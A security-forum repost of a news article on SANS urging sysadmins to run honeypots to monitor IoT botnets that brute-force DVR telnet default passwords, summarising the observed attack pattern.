SANS issues call to arms to battle IoT botnets

Solarquest

Moderator
Thread author
Verified
Staff Member
Malware Hunter
Well-known
Jul 22, 2014
2,525
The SANS Institute is hoping sysadmins can help it do what vendor's won't: improve Internet of Things security.

The call comes in the wake of not one but two IoShitT-based botnet attacks – the 600 Gbps-plus slam that sent security publication Krebs on Security from Akamai to Google Shield, and the same botnet escalating to nearly 1 Tbps in an attack on French hosting provider OVH – SANS wants suitably-skilled sysadmins to lay out the honey.


In this analysis, SANS asks that people “Consider running the latest version of cowrie on a honeypot to help us keep an eye on the passwords attempted to look for any shifts in the current pattern.”

The analysis focuses on digital video recorders (DVRs) that are either unpatched to remove old default telnet credentials, or they're from manufacturers that haven't bothered patching that kind of hole.

SANS's Johannes Ullrich, PhD, writes that his honeypot setup shows lots of scans testing default passwords like xc3511 (for a generic Chinese device, DH-3004, since patched) and 7ujMko0 (which some DVRs add to their default Web password).

Ulrich's own DVR honeypot, when he connected it to the Internet, was hit with so many telnet attempts that it had to be rebooted regularly.

The attempted attacks followed a predictable pattern:

  • Try to log in using the default credentials;
  • Try to detect if a honeypot is attached;
  • Fingerprint the target to work out its CPU and partition list;
  • Check if the disk is writable from telnet;
  • Test wget and tftp; and
  • See if the target will build binaries.
If the target passes the tests, the attacker loads its bot software, and starts scanning for more vulnerable hosts (at a rate of more than 100 connections/second).

Ulrich's post includes the bot software he observed.

So if you decide to run up a honeypot, that's what to expect. ®
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top